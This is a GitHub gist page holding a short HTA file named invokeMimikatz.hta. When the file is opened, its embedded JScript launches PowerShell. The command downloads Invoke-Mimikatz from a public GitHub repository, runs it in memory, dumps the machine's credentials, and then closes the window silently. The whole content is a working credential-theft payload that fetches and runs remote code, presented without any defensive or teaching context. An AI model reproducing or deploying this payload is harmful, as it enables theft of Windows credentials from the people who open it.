Skip to content

Instantly share code, notes, and snippets.

@aaaddress1
Created December 16, 2021 08:08
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save aaaddress1/92b5600d12a304fd0ddd5fd9a1bdd5a6 to your computer and use it in GitHub Desktop.
Save aaaddress1/92b5600d12a304fd0ddd5fd9a1bdd5a6 to your computer and use it in GitHub Desktop.
invokeMimikatz.hta
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment